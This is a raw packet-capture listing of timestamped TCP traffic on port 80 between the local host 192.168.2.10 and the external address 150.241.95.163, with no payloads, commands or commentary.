Nov 15, 2024 10:28:58.744683027 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.744702101 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.744750023 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.746718884 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.746754885 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.746778011 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.747529030 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.747539997 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.747589111 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.749233007 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.749243021 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.749363899 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.750457048 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.750524044 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.750528097 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.754494905 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.754506111 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.754517078 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.754535913 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.754584074 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.754631042 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.754971981 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.755047083 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.755120039 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.755284071 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.757515907 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.757527113 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.757535934 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.757620096 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.759733915 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.759744883 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.759800911 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.760802984 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.760813951 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.760874033 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.762089968 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.762100935 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.762224913 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.762254953 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.762264967 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.762453079 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.763480902 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.763662100 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.763789892 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.765125990 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.765139103 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.765149117 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.765183926 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.765239000 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.766762018 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.766772985 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.766820908 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.768047094 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.768059015 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.768105984 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.769367933 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.769382000 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.769392967 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.769483089 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.771703005 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.771879911 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.771889925 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.771961927 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.771962881 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.774146080 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.774159908 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.774298906 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.774321079 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.776577950 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.776590109 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.776598930 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.776658058 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.776705027 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.778187990 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.778198004 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.778208017 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.778250933 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.779681921 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.779762030 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.779828072 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.780781031 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.780790091 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.781203032 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.781965971 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.781975031 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.782073021 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.783837080 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.783874035 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.784017086 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.784822941 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.784873009 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.784913063 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.784934998 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.784981966 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.784982920 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.784993887 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.785038948 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.788614988 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.788635015 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.788645029 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.788686037 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.793361902 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.793374062 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.793384075 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.793488026 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.793488026 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.797122002 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.797135115 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.797144890 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.797246933 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.801395893 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.801414013 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.801424980 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.801456928 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.801477909 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.805042028 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.805053949 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.805139065 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.805207968 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.809310913 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.809322119 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.809369087 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.809488058 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.809495926 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.809537888 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.815401077 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.815413952 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.815479040 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.815567970 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.815664053 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.816781998 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.816792011 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.816884995 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.816965103 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.816975117 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.817039967 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.820122957 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.820133924 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.820142984 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.820194960 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.823793888 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.823805094 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.823815107 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.823903084 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.823903084 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.823934078 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.824110985 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.824120045 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.824191093 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.827528954 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.827539921 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.827548981 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.827852011 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.830828905 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.831011057 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.831021070 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.831155062 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.834323883 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.834949970 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.835010052 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.835098982 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.835156918 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.835390091 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.838073969 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.838136911 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.838226080 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.838238001 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.838248968 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.838371038 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.842488050 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.842506886 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.842516899 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.842628002 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.842628002 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.842657089 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.844413996 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.844424963 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.844472885 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.844482899 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.844501972 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.847357035 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.847861052 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.847873926 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.847883940 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.847968102 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.847968102 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.851394892 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.851407051 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.851417065 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.851505041 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.852355003 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.852391958 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.852436066 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.854780912 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.854799032 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.854809046 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.854862928 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.854862928 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.855844021 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.855853081 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.855918884 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.868681908 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.871165037 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.871215105 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.871227026 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.871244907 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.871254921 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.871294975 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.871321917 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.871562958 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.871612072 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.871622086 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.871680975 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.871680975 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.871692896 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.871737957 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.872370005 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.872447014 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.872677088 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.872688055 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.872698069 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.872741938 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.873644114 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.873703003 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.873754978 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.873817921 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.873859882 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.873859882 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.877022028 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.877038956 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.877089977 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.877110958 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.877136946 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.877159119 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.878711939 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.878767014 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.878767967 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.878779888 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.878846884 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.881063938 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.881105900 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.881118059 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.881179094 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.881246090 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.881293058 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.881297112 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.883085012 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.883131981 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.883141041 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.883158922 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.883214951 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.885802031 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.885899067 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.885945082 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.885971069 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.887980938 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.888021946 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.888057947 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.888102055 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.888102055 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.888273001 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.888403893 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.889925957 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.890141010 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.890201092 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.890546083 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.890855074 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.890865088 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.891225100 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.892638922 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.892652035 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.892663002 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.892997980 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.894737005 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.894757986 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.894769907 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.894802094 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.894911051 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.897618055 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.897660971 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.897672892 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.897758007 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.900696993 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.900796890 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.900809050 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.900887012 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.900887012 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.901710033 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.901720047 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.901768923 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.901801109 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.901813030 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.901824951 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.901835918 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.901884079 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.901884079 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.905939102 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.905958891 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.905970097 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.906044006 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.910067081 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.910079002 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.910089016 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.910140991 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.910192013 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.913260937 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.913285971 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.913295031 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.913464069 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.917567968 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.917589903 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.917608023 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.917670012 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.917752981 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.921230078 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.921262026 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.921483994 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.922457933 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.922519922 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.922570944 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.925649881 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.925662994 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.925717115 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.925726891 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.931741953 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.931761980 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.931772947 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.931821108 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.931879044 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.933012009 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.933023930 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.933058023 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.933079958 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.933084011 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.935337067 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.936398983 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.936424971 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.936436892 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.936481953 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.936481953 CET	80	49762	150.241.95.163	192.168.2.10
